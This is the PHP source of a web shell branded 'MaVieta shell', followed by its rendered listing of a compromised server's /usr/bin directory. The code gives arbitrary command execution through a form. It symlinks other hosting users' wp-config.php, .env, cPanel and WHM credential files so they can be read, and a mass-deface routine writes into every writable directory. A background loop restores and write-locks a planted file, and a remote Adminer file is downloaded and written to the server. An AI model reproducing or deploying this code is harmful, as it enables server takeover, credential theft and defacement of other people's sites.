    echo "<table class='directory-listing-table'><td>";
    echo '<br><form method="post"><center>
    <div class="input-group" style="width:600px;">
    <span class="input-group-text mb-1">Command :</span>
     <input type="text" class="form-control" name="komen" id="comandnya" value="'.$_POST['komen'].'" placeholder="uname -a" required>
    <button type="submit" name="comandeks" value="execute" class="btn btn-outline-light mb-1">>></button></div></form><br><center>';
    if (isset($_POST['comandeks'])) {
        ekse($_POST['komen'], $serlok);
    }
    echo "</center></td></table><br></center>";
    exit();
} elseif ($_REQUEST[net('about')] == "opet") {
    echo "<table class='directory-listing-table'><thead><td><div style='font-family: Bungee Outline;font-size:24px;'>
    <img class='crot' src='https://i.pinimg.com/564x/84/0e/4c/840e4c57fab2ba6279b377ae8dc333d3.jpg'/> Priv shell uwu edition</div><hr>
    <br> - MaVieta shell v2.2 <br> - Created by MaVieta</td></thead></table>"; exit();
} elseif ($_REQUEST[net('lokfile')] == "opet") {
    echo "<table class='directory-listing-table'><td>
    <h5><i class='fa fa-lock' style='color:#1A9DD2;'></i> Lock file<font class='MaVieta-text' style='font-size:12px;'><i> Linux</i></font></h5><hr style='color:#04FBFF;'>
    <center><form method='post'>
    <div class='input-group' style='width:300px;'>
    <span class='input-group-text mb-2'>Filename :</span>
    <input type='text' name='pile' class='form-control mb-2' placeholder='file.php'/></div><br>
    <button type='sumbit' class='btn btn-outline-light' style='width:120px;' name='submit'>Submit</button> 
    <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light' style='width:120px;'>Back</a></form><br></td></table>";
    if (isset($_POST['submit'])) {
        if (empty($_POST['pile'])) {
            echo "<br><table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center>The File field is required</center></font></td></table>";
        } else {
        $filez = $_POST['pile'];
        $tempe = "/tmp";
        if (file_exists($tempe.'/'.md5($serlok. $filez.'-xMaVieta').MaVieta_ex($filez).'xhand.Lock') && file_exists($tempe . '/'.MaVieta_ex($filez).'-xopet')) {
            cmd('rm -rf '.$tempe.'/'.md5($serlok. $filez.'-xopet').MaVieta_ex($filez).'xMaVieta.Lock', $serlok);
            cmd('rm -rf '.$tempe.'/'.md5($serlok. $filez.'-xMaVieta').MaVieta_ex($filez).'xhand.Lock', $serlok);
            }
            cmd("cp $filez ".$tempe."/".md5($serlok. $filez.'-xopet').MaVieta_ex($filez).'xMaVieta.Lock', $serlok);
            @chmod($filez, 0444);
            $content = '<?php
    $tmp = "/tmp";
    $fileperm = MaVieta_perm("'.$filez.'");
    MaVieta_cmd("chmod 444 '.$filez.'");
    while (True) {
        if (!file_exists("'.$filez.'")) {
            $var = base64_encode(file_get_contents($tmp . "/'.md5($serlok. $filez.'-xopet').MaVieta_ex($filez).'xMaVieta.Lock"));
            FiLe_pUt_ConTentS("'.$filez.'", base64_decode($var));
        }
        if ($fileperm != "0444"){
            MaVieta_cmd("chmod 444 '.$filez.'");
        }
    }
    function MaVieta_cmd($value)
    {
        if (function_exists("system")) {
            sYsTem($value);
        } else if (function_exists("shell_exec")) {
            return ShEll_eXeC($value);
        } else if (function_exists("exec")) {
            return ExEc($value);
        } else if (function_exists("passthru")) {
            return pAsSThRu($value);
        }
    }
    function MaVieta_perm($filez){
        return substr(sprintf("%o", fileperms($filez)), -4);
    }';
    $content = file_put_contents($tempe. "/" .md5($serlok. $filez.'-xMaVieta'). MaVieta_ex($filez).'xhand.Lock', $content);
    if ($content) {
        echo "<table class='directory-listing-table' style='border-color:lime;'><td>Locked => <font color='lime'>$filez</font></td></table>";
        cmd('php '. $tempe . '/' .md5($serlok. $filez.'-xMaVieta').MaVieta_ex($filez).'"xhand.Lock" > /dev/null 2>/dev/null &', $serlok);
    } else {
        echo "<table class='directory-listing-table' style='border-color:red;'><td><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Can't lock $filez</font></td></table>";
            }
        }
    }exit();
} elseif ($_GET[net('resetcp')] == "opet") {
echo "<table class='directory-listing-table'><td>
<h5>Coming Soon</h5><hr></td></table><br>";exit();
} elseif ($_GET[net('hashiden')] == "opet") {
 echo "<table class='directory-listing-table'><td>
<h5>Hash Identifier</h5>Identify and detect unknown hashes using this tool.<hr>
<form method='POST'>
<div class='input-group' style='width:650px;'>
<span class='input-group-text mb-2'>Your hash :</span>
<input type='text' name='hash' class='form-control mb-2' placeholder='write here'></div><br>
<button type='submit' name='submit' class='btn btn-outline-light'>Submit & identify</button>
 <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light'>Back</a></form></td></table><br>";
if (isset($_POST['submit'])) {
    if (empty($_POST['hash'])) {
        echo "<table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> The Hashes field is required</font></center></td></table>";
    } else {
function identify($hash) {
$algorithms = [
'<font color="lime">MD5' => '/^[a-f0-9]{32}$/i',
'<font color="lime">SHA1' => '/^[a-f0-9]{40}$/i',
'<font color="lime">SHA224, Keccak-224' => '/^[a-f0-9]{56}$/i',
'<font color="lime">SHA256' => '/^[a-f0-9]{64}$/i',
'<font color="lime">SHA512' => '/^[a-f0-9]{128}$/i',
'<font color="lime">Bcrypt, Blowfish(Unix)' => '/^\$2y\$[0-9]{2}\$[A-Za-z0-9\.\/]{53}$/',
'<font color="lime">Argon2i' => '/^\$argon2i\$v=\d+\$m=\d+,t=\d+,p=\d+\$[A-Za-z0-9\/+]{43,}\$[A-Za-z0-9\/+]{43,}$/',
'<font color="lime">Argon2id' => '/^\$argon2id\$v=\d+\$m=\d+,t=\d+,p=\d+\$[A-Za-z0-9\/+]{43,}\$[A-Za-z0-9\/+]{43,}$/'];
    foreach ($algorithms as $name => $pattern) {
        if (preg_match($pattern, $hash)) {
            return $name;
        }
    }
    return '<font color="red">Could not identify / Tidak dapat mengidentifikasi</font>';
}
$hashes = [$_POST['hash']];
echo "<table class='directory-listing-table'><td>";
foreach ($hashes as $hash) {
    echo "
    Hash : <font color='lime'>$hash\n</font>";
    echo "<br> Algorithms : " .identify($hash). "\n\n</font></td></table>";
            }
        }
    } exit();
} elseif ($_GET[net('grab_config')] == "opet") {
@ini_set('max_execution_time',0); 
@ini_set('display_errors', 0); 
@ini_set('file_uploads',1);
echo '<table class="directory-listing-table"><thead><td>
<center>Config Grabber<br><br><form method="POST"><textarea cols="100" name="passwd"  rows="25">'; 
$uSr=file("/etc/passwd"); 
foreach($uSr as $usrr) { 
$str=explode(":",$usrr); echo $str[0]."\n"; } 
echo'</textarea><br>
<input type="hidden" class="input" name="folfig" value="MaVietacfg"/><br>
<select class="form-select form-select-sm" aria-label=".form-select-lg example" style="width:150px;">
<option>select menu</option>
<option title="type txt" value=".txt">.txt</option>
<option title="type php" value=".php">.php</option>
<option title="type shtml" value=".shtml">.shtml</option>
<option title="type ini" value=".ini">.ini</option>
<option title="type html" value=".html">.html</option></select><br>
<input name="conf" style="width:100px;" class="btn btn-outline-light" value="submit" type="submit">
</td></thead></table></form></center><br>';
} if(isset($_POST['conf'])) {
$v = "var";
$folfig = $_POST['folfig']; $type = $_POST['type'];
@mkdir($folfig, 0755); 
@chdir($folfig);
$htaccess="
Options Indexes FollowSymLinks
\nDirectoryIndex .my.cnf
\nAddType txt .php
\nAddType txt .my.cnf
\nAddType txt .accesshash
\nAddHandler txt .php
\nAddHandler txt .cnf
\nAddHandler txt .accesshash
";
file_put_contents(".htaccess",$htaccess,FILE_APPEND);
$passwd=explode("\n",$_POST["passwd"]);
foreach($passwd as $pwd){ $user=trim($pwd);
@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
@symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
@symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
@symlink('/home/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wp1.txt');
@symlink('/home/'.$user.'/htdocs/wp-config.php',$user.'-Wp-htdocs.txt');
@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wp2.txt');
@symlink('/home/'.$user.'/public_html/web/wp-config.php',$user.'-Wp3.txt');
@symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-WpHm1.txt');
@symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-WpHm2.txt');
@symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-WpHm3.txt');
@symlink('/var/www/html/wp-config.php',$v.'-wp1.txt');
@symlink('/home/'.$user.'/public_html/.env',$user.'-Laravel1.txt');
@symlink('/home/'.$user.'/public_html/web/.env',$user.'-Laravel2.txt');
@symlink('/home/'.$user.'/public_html/public/.env',$user.'-Laravel3.txt');
@symlink('/var/www/html/.env',$v.'-LaravelV.txt');
@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
@symlink('/home/'.$user.'/public_html/html/configuration.php',$user.'-Joomla2.txt');
@symlink('/home/'.$user.'/public_html/web/configuration.php',$user.'-Joomla3.txt');
@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
@symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
@symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
@symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
@symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
@symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
@symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
@symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-Magento.txt');
@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
@symlink('/home/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter.txt');
@symlink('/home/'.$user.'/public_html/web/application/config/database.php',$user.'-CodeIgniterH.txt');
@symlink('/home1/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter1.txt');
@symlink('/home2/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter2.txt');
@symlink('/home3/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter3.txt');
@symlink('/home/'.$user.'/.my.cnf',$user.'-cpanel.txt');
@symlink('/home/'.$user.'/.accesshash',$user.'-whm.txt');
@symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-opencart.txt');
@symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-mangento.txt');
echo '<table class="directory-listing-table"><thead><td><center>Done => <a href='.$folfig.' target="_blank" class="button">Click Here</a></center></td></thead></table><br>';
    }exit();
} elseif ($_REQUEST[net('scanshell')] == "opet") {
    echo "<center><table class='directory-listing-table'><td>
    <form method='post'>
    <h5><i class='fa-solid fa-newspaper'></i> Backdoors Scanning</font></h5><hr>
    *note : Jika resultnya kosong berarti tidak ditemukan/ekstensi nya di isi dengan benar
    <div class='input-group mb-2' style='width:350px;'>
    <span class='input-group-text mb-1'>Extension :</span>
    <input type='text' class='form-control' name='ext' placeholder='ex : php, phar, shtml, phtml'></div>
    <div class='input-group mb-2' style='width:550px;'>
    <span class='input-group-text mb-1'>Directory :</span>
    <input type='text' class='form-control' name='peth' value='$serlok'></div>
    <button type='submit' class='btn btn-outline-light' name='submit' style='width:120px;'>Submit</button> 
    <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light' style='width:120px;'>Back</a>
    </form></td></table><br>";
    if(isset($_POST['submit'])) {
        function scan_directory($dir) {
    $ext = $_POST['ext'];
    $rdi = new RecursiveDirectoryIterator($dir);
    echo "<table class='directory-listing-table'><td>";
    foreach (new RecursiveIteratorIterator($rdi) as $filename => $file) {
        if (pathinfo($filename, PATHINFO_EXTENSION) == $ext) {
            $content = file_get_contents($filename);
            if (preg_match('/(eval|base64_decode|str_rot13|mass_deface|addrdp|@exec|@passthru|@chmod|#exec|deface|command|{IFS}|shell_exec|SERVER_SOFTWARE|wget|@get_current_user|@getmygid|htmlspecialchars_decode|B374k|@getmygid|hacked|exe_root|xploit|Disable_Function|backdoor|backconnect|gecko-select|php_uname|Alfa-Team|ALFA_DATA|MARIJUANA|blackeagleteam|IndoSec|getHostByName|alfashell|php-obfuscator|gacor|slot-gacor|slot88|featureShell|move_upload_file|upload)\s*\(/i', $content)) {
                echo "<pre>Found : <font color='lime'>$filename</font> => <font color='orange'>Detected</font> <a href='?viewfile=$filename&path=".$_GET['path']."/$rdi' target='_blank'><i>view</i></a></pre>\n";
            }
        }
    } 
} 
$cek = $_POST['peth'];
if ($cek) {
scan_directory($cek);
echo "<font color='aqua'>Scan Completed..!!</font></td></table><br>";
        } 
    } exit();
} elseif ($_REQUEST[net('massdef')] == "opet") {
    function sabun_massal($serlok,$namafile,$isi_script) {
        if(is_writable($serlok)) {
            $dira = scandir($serlok);
            foreach($dira as $dirb) {
                $dirc = "$serlok/$dirb";
                $lokasi = $dirc.'/'.$namafile;
                if($dirb === '.') {
                    file_put_contents($lokasi, $isi_script);
                } elseif($dirb === '..') {
                    file_put_contents($lokasi, $isi_script);
                } else {
                    if(is_dir($dirc)) {
                        if(is_writable($dirc)) {
                            echo "[<font color=lime>DONE</font>] $serlok<br>";
                            file_put_contents($lokasi, $isi_script);
                            $idx = sabun_massal($dirc,$namafile,$isi_script);
                        }
                    }
                }
            }
        }
    }
    function sabun_biasa($serlok,$namafile,$isi_script) {
        if(is_writable($serlok)) {
            $dira = scandir($serlok);
            foreach($dira as $dirb) {
                $dirc = "$serlok/$dirb";
                $lokasi = $dirc.'/'.$namafile;
                if($dirb === '.') {
                    file_put_contents($lokasi, $isi_script);
                } elseif($dirb === '..') {
                    file_put_contents($lokasi, $isi_script);
                } else {
                    if(is_dir($dirc)) {
                        if(is_writable($dirc)) {
                            echo " http://$dirb/$namafile<br>";
                            file_put_contents($lokasi, $isi_script);
                        }
                    }
                }
            }
        }
    }
    if($_POST['start']) {
        if($_POST['tipe_sabun'] == 'mahal') {
            echo "<table class='directory-listing-table'><td>";
            sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
            echo "</td></table></div>";
        } elseif($_POST['tipe_sabun'] == 'murah') {
            echo "<table class='directory-listing-table'><td>";
            sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
            echo "</td></table></div>";
        }
    } else {
    echo "<table class='directory-listing-table'><td>";
    echo "<form method='post'>
    <div class='form-check-inline mb-2'>
    <input type='radio' name='tipe_sabun' id='biasa' class='form-check-input' value='murah' checked>
    <label class='form-check-label' for='inlineRadio1'>Biasa</label></div>
    <div class='form-check form-check-inline'>
    <input type='radio' name='tipe_sabun' class='form-check-input' value='mahal'>
    <label class='form-check-label' for='inlineRadio2'>Massal</label></div>
    <div class='input-group' style='width:430px;'>
    <span class='input-group-text mb-1'>Files :</span>
    <input type='text' name='d_file' class='form-control' placeholder='file.html'></div>
    <div class='input-group' style='width:750px;'>
    <span class='input-group-text mb-1'>Path :</span>
    <input type='text' name='d_dir' class='form-control' value='$serlok'></div>
    <textarea name='script' class='form-control' style='width: 750px; height: 300px;' placeholder='Hello Word!'></textarea><br>
    <button type='submit' name='start' value='start' class='btn btn-outline-light' style='width: 300px;'>submit</button> 
    <a href='?path=$serlok&".net('tool')."=opet' class='btn btn-outline-light' style='width: 300px;'>Back</a>
    </form></td></table>";
    }exit();
} elseif ($_REQUEST[net('ner')] == "opet") {
    function crot($url){
        $MaVieta = curl_init($url);
        curl_setopt($MaVieta, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($MaVieta, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($MaVieta, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($MaVieta, CURLOPT_HEADER, 0);
        return curl_exec($MaVieta);
        curl_close($MaVieta);
    } 
        echo "<table class='directory-listing-table'><td><h5><i class='fa fa-database' aria-hidden='true'></i> Adminer<font class='MaVieta-text' style='font-size:12px;'><i> v4.8.1</i></font></h5><hr><center>
    <form method='POST'>
    <div class='input-group' style='width:300px;'>
    <span class='input-group-text mb-2'>Filename :</span>
    <input type='text' placeholder='adminer.php' class='form-control mb-2' name='miner'></div><br>
        <button type='sumbit' class='btn btn-outline-light' name='gass' style='width:120px;'>Submit</button> 
        <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light' style='width:120px;'>Back</a></form></td></table><br>";
    if(isset($_POST['gass'])) {
        if (empty($_POST['miner'])) {
            echo "<table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Input field is required<center></font></td></table>";
        } else {
    $check = $serlok."/".$_POST['miner'];
    $result = str_replace($_SERVER['DOCUMENT_ROOT'], $web."",$check);
    $content = crot('https://raw.githubusercontent.com/bellpwn/netxploit/main/adminer.php');
    $open = fopen($check, 'w');
    fwrite($open, $content);
    fclose($open);
    if (file_exists($check)) {
        echo "<table class='directory-listing-table' style='border-color:lime;'><td>Adminer<font color='lime'> : $check </font><br>Link : <a href='".$result."' target='_blank'><i>$result</i></a></td></table>";
    } else {
        echo "<table class='directory-listing-table' style='border-color:red;'><td><font color='red'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to create adminer..!!</center></font></td></table>";
                    }
                }
        }exit();
} elseif ($_REQUEST[net('buatfile')] == "opet") {
    function createfile(){
        $pat = $_GET['path'];
        $nama_file = $_POST['nama_file'];
        $isi_file = $_POST['isi_file'];
        $handle = fopen("$pat/$nama_file", 'w');
        $files = $_GET['path']."/".$nama_file;
        $asu = str_replace($_SERVER['DOCUMENT_ROOT'], $web. "", $files);
        if (fwrite($handle, $isi_file)) {
            echo '<table class="directory-listing-table" style="border-color:lime;"><td>Created => <font color="lime">'.$pat.'/'.$nama_file.'<br></font>Link : <a href="'.$asu.'" target="_blank"><font color="aqua"><i>Click here</i></a></font></td></table>';
        } else {
            echo '<table class="directory-listing-table" style="border-color:red;"><td><font color=red><i class="fa fa-exclamation-triangle" aria-hidden="true"></i> Failed to create file..!!</font></script></td></table>';
        }
    } if(!isset($_POST['bikin'])) {
        echo "<center><table class='directory-listing-table'><td width='12%''>
    <form method='POST'>
        <input type='text' value='file.php' placeholder='Nama File' style='width: 525px;' name='nama_file' autocomplete='off'><br><br>
        <textarea name='isi_file' rows='20' cols='100' placeholder='Hello World!'></textarea><br>
        <button type='sumbit' class='btn btn-outline-light' style='width:200px; height:36px;' height:30;' name='bikin'>CREATE</button> 
        <a href='?path=".$serlok."' class='btn btn-outline-light'>Back</a><br>
    </form></center>";
        } else {
            createfile();
        }exit();
} elseif ($_GET[net('buatfolder')] == "opet") {
      function createDirectory() {
        if (empty($_POST['add'])) {
        echo '<table class="directory-listing-table" style="border-color:orange;"><td><font color="orange">Folder field is required</font> [<a href="?path='.$_GET['path'].'&'.net("buatfolder").'=opet"><i class="fa-solid fa-folder-plus" aria-hidden="true"></i>Create again</a>]</td></table>';
        } else {
        $add = $_POST["add"];
        $MaVieta = mkdir($_GET['path']."/".$add);
        if ($MaVieta == true) {
            echo "<table class='directory-listing-table' style='border-color:lime;'><td>Created =><font color=lime> ".$_GET['path']."/</font><font color='orange'>$add</font><br>
            <a href='?path=".$_GET['path']."/$add'><u>Click Here</u></a></td></table>";
    } else {
            echo "<table class='directory-listing-table' style='border-color:red;'><td><font color=red><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to create folder : $add</font></td></table>";
                }
        }
}
        if (!isset($_POST['submit'])) {
            echo '<table class="directory-listing-table"><td>
        <form action="" method = "POST"><h5><i class="fa fa-folder-plus"></i> Create Folder</h5><hr><center>
        <div style="width:300px;">
         <input type="text" class="form-control" placeholder="Folder Name" name="add" id="add"/><br></div>
        <button type="submit" class="btn btn-outline-light" name="submit" value="Create directory" style="width:120px;">Create</button> 
        <a href="?path='.$serlok.'" class="btn btn-outline-light" style="width:120px;">Back</a><br><br></form></td></table>';
        } else {
            createDirectory();
        }exit();
} elseif ($_REQUEST[net('info')] == "opet") {
    echo "<table class='directory-listing-table' align='center'>
    <div id='content'><tr><td>";
    echo "Server : <font color=orang>".$_SERVER['HTTP_HOST']."</font><br>";
    echo "Server IP : <font color=orange>".ipserv()."</font>  <br> Your IP : <font color=orange>".$_SERVER['REMOTE_ADDR']."</font><br>";
    echo "Web Server : <font color='orange'>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
    echo "System : <font color='orange'>".php_uname()."</font><br>";
    echo "User : <font color='orange'>".@get_current_user()." </font>( <font color='orange'>".@getmyuid()."</font>)<br>";
    echo "PHP Version : <font color='orange'>".@phpversion()." </font>=><font color='orange'> ".php_sapi_name()."</font><br>";
    echo "</tr></td><tr><td>Disable Function : ".$disf."</font>";
    echo "</div></tr></td><tr><td>";
    echo "<hr>Orecle : ";
if (function_exists('oci_connect')) {
        echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";

    echo " | SSH2 : ";
}

if (function_exists('ssh2_connect')) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";

    echo " | MySQL : ";
}
if (function_exists("mysql_connect")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | cURL : ";
if (function_exists("curl_init")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | WGET : ";
if (file_exists("/usr/bin/wget")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | Perl : ";
if (file_exists("/usr/bin/perl")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | Python : ";
if (file_exists("/usr/bin/python2")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
$pkexec = (@shell_exec("pkexec --version")) ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>";
    echo " | PKEXEC : $pkexec<br><br>";
    echo "</tr></td></table><br>";
    exit();

}


if (!is_readable($serlok)) {
    die("<table class='directory-listing-table'><thead><td><center><font color=orange>This directory is unreadable :(</font></center></td></thead></table>");
}

echo '<table class="table table-dark table-hover" style="box-shadow: 0 0 20px black;width:90%;border-left:1px solid #40BECC;border-right:1px solid #40BECC;border-bottom:1px solid #40BECC;--bs-border-radius:80rem;" align="center">
<thead style="--bs-table-bg:#0D97A5;--bs-table-color:#000;"><tr>
<th><center>Name</center></th>
<th><center>Size</center></th>
<th><center>Last Modified</center></th>
<th><center>Owner</center></th>
<th><center>Permissions</center></th>
<th><center>Actions</center></th>
</tr></thead><center>';
$scd = "\163\143"."\141\156\144"."\151\162";
if(is_readable($serlok)){
            $fetch=$scd($serlok);
            $serlokbos=array();
            $filez=array();
            foreach($fetch as $fols){
                if($fols=='.'||$fols=='..'){
                    continue;
                }
                    $MaVietas=$serlok.'/'.$fols;
                    if(is_dir($MaVietas)){
                        array_push($serlokbos,$fols);
                    }elseif(is_file($MaVietas)){
                        array_push($filez,$fols);
                    }
                }
            }
foreach($serlokbos as $dir){
    echo "<tr>
    <td><i class='fa fa-folder' style='color: #FAA625'></i> <a href=\"?path=".$serlok."/".$dir."\">".$dir."</a></td>
    <td><center>Dir</center></td>
    <td><center>".filedate($serlok."/".$dir)."</center></td>
    <td>".owner($serlok."/".$dir)."</td>
    <td><center>";
    if(is_writable($serlok."/".$dir)) echo '<font color="lime">';
    elseif(!is_readable($serlok."/".$dir)) echo '<font color="red">';
    echo statusnya($serlok."/".$dir);
    if(is_writable($serlok."/".$dir) || !is_readable($serlok."/".$dir)) echo '</font>';

    echo "</center></td>
    <td><center><form method=\"POST\" action=\"?pilihan&path=$serlok\">
    <div class='btn-group me-2' role='group' aria-label='First group'>
    <button type='submit' class='btn btn-outline-secondary badge-action-rename' name='pilih' value='gantinama'>
    <i class='fa fa-pencil' style='color: #fff'></i></button>
    <button type='submit' class='btn btn-outline-secondary badge-action-chmod' name='pilih' value='chmodf'><i class='fa fa-gear' style='color: #06D2D5'></i></button>
    <button type='submit' class='btn btn-outline-secondary badge-action-tanggal' name='pilih' value='chdatef'><i class='fa fa-calendar' style='color: #5654F5'></i></button>
    <button type='submit' class='btn btn-outline-secondary badge-action-delete' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #E53A3A'></i></button></div>
    <input type=\"hidden\" name=\"type\" value=\"dir\">
    <input type=\"hidden\" name=\"name\" value=\"$dir\">
    <input type=\"hidden\" name=\"path\" value=\"$serlok/$dir\">
    </form></center></td>
    </tr>";
}

foreach($filez as $file) {
    if(!is_file("$serlok/$file")) continue;
        $size = filesize("$serlok/$file")/1024;
        $size = round($size,3);
        if($size >= 1024){
        $size = '<font color="aqua">'.round($size/1024,2).'</font> MB';
    } else {
        $size = '<font color="#E6F01C">'.$size.'</font> KB';
    }
echo "<tr>
<td>".cekfile($serlok."/".$file)."
<a href=\"?viewfile=".$serlok."/$file&path=".$serlok."\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>".filedate($serlok."/".$file)."</center></td>
<td>".owner($serlok."/".$file)."</td>
<td><center>";
if(is_writable("$serlok/$file")) echo '<font color="lime">';
elseif(!is_readable("$serlok/$file")) echo '<font color="red">';
echo statusnya("$serlok/$file");
if(is_writable("$serlok/$file") || !is_readable("$serlok/$file")) echo '</font>';
echo "</center></td><td><center>
<form method='post' action='?pilihan&path=$serlok'>
<div class='btn-group' role='group' aria-label='First group'>";
echo gazz($file);
echo "</div><input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$serlok/$file\">
</form></center></td></tr>";
}
echo '</tr></td></table></table>';
author();

function statusnya($file){
$izin = substr(sprintf('%o', fileperms($file)), -4);
return $izin;
}
?>
</body>
</html>
1#@!#!123s

: usr / bin / 

Name
Size
Last Modified
Owner
Permissions
Actions
[
50.438 KB
February 08 2024 11:46:39
root
0755
aa-enabled
34.516 KB
March 07 2024 2:35:00
root
0755
aa-exec
34.516 KB
March 07 2024 2:35:00
root
0755
aa-features-abi
30.516 KB
March 07 2024 2:35:00
root
0755
ab
58.43 KB
August 11 2025 8:10:10
root
0755
aclocal
35.176 KB
March 18 2022 9:09:08
root
0755
aclocal-1.16
35.176 KB
March 18 2022 9:09:08
root
0755
acpi_listen
18.57 KB
January 25 2022 6:00:15
root
0755
add-apt-repository
14.139 KB
October 24 2023 9:07:34
root
0755
addpart
14.375 KB
April 09 2024 11:32:56
root
0755
addr2line
26.703 KB
December 03 2025 11:08:01
root
0755
apropos
47.281 KB
March 18 2022 3:03:00
root
0755
apt
18.383 KB
October 22 2024 9:09:58
root
0755
apt-add-repository
14.139 KB
October 24 2023 9:07:34
root
0755
apt-cache
82.469 KB
October 22 2024 9:09:58
root
0755
apt-cdrom
26.469 KB
October 22 2024 9:09:58
root
0755
apt-config
26.391 KB
October 22 2024 9:09:58
root
0755
apt-extracttemplates
22.469 KB
October 22 2024 9:09:58
root
0755
apt-ftparchive
230.477 KB
October 22 2024 9:09:58
root
0755
apt-get
50.469 KB
October 22 2024 9:09:58
root
0755
apt-key
27.513 KB
October 22 2024 9:09:58
root
0755
apt-mark
50.469 KB
October 22 2024 9:09:58
root
0755
apt-sortpkgs
38.398 KB
October 22 2024 9:09:58
root
0755
ar
54.484 KB
December 03 2025 11:08:01
root
0755
arch
30.508 KB
February 08 2024 11:46:39
root
0755
as
456.398 KB
December 03 2025 11:08:01
root
0755
autoconf
14.848 KB
August 23 2021 11:33:47
root
0755
autoheader
8.822 KB
August 23 2021 11:33:47
root
0755
autom4te
32.69 KB
August 23 2021 11:33:47
root
0755
automake
255.913 KB
March 18 2022 9:09:08
root
0755
automake-1.16
255.913 KB
March 18 2022 9:09:08
root
0755
autopoint
26.38 KB
March 25 2022 6:31:07
root
0755
autoreconf
26.303 KB
August 23 2021 11:33:47
root
0755
autoscan
16.774 KB
August 23 2021 11:33:47
root
0755
autoupdate
33.22 KB
August 23 2021 11:33:47
root
0755
awk
154.789 KB
January 24 2022 5:57:23
root
0755
b2sum
50.516 KB
February 08 2024 11:46:39
root
0755
base32
34.508 KB
February 08 2024 11:46:39
root
0755
base64
34.508 KB
February 08 2024 11:46:39
root
0755
basename
34.508 KB
February 08 2024 11:46:39
root
0755
basenc
46.508 KB
February 08 2024 11:46:39
root
0755
bash
1.33 MB
March 14 2024 7:31:47
root
0755
bashbug
6.658 KB
March 14 2024 7:31:47
root
0755
bootctl
70.492 KB
June 04 2025 10:17:43
root
0755
bunzip2
38.375 KB
March 23 2022 5:45:10
root
0755
busctl
90.492 KB
June 04 2025 10:17:43
root
0755
busybox
2.09 MB
August 13 2024 9:39:23
root
0755
bzcat
38.375 KB
March 23 2022 5:45:10
root
0755
bzcmp
2.173 KB
March 23 2022 5:45:10
root
0755
bzdiff
2.173 KB
March 23 2022 5:45:10
root
0755
bzegrep
3.687 KB
March 23 2022 5:45:10
root
0755
bzexe
4.778 KB
November 27 2021 8:25:05
root
0755
bzfgrep
3.687 KB
March 23 2022 5:45:10
root
0755
bzgrep
3.687 KB
March 23 2022 5:45:10
root
0755
bzip2
38.375 KB
March 23 2022 5:45:10
root
0755
bzip2recover
14.297 KB
March 23 2022 5:45:10
root
0755
bzless
1.267 KB
March 23 2022 5:45:10
root
0755
bzmore
1.267 KB
March 23 2022 5:45:10
root
0755
c++
906.82 KB
April 22 2025 11:28:20
root
0755
c++filt
22.266 KB
December 03 2025 11:08:01
root
0755
c89
0.418 KB
November 18 2020 2:53:07
root
0755
c89-gcc
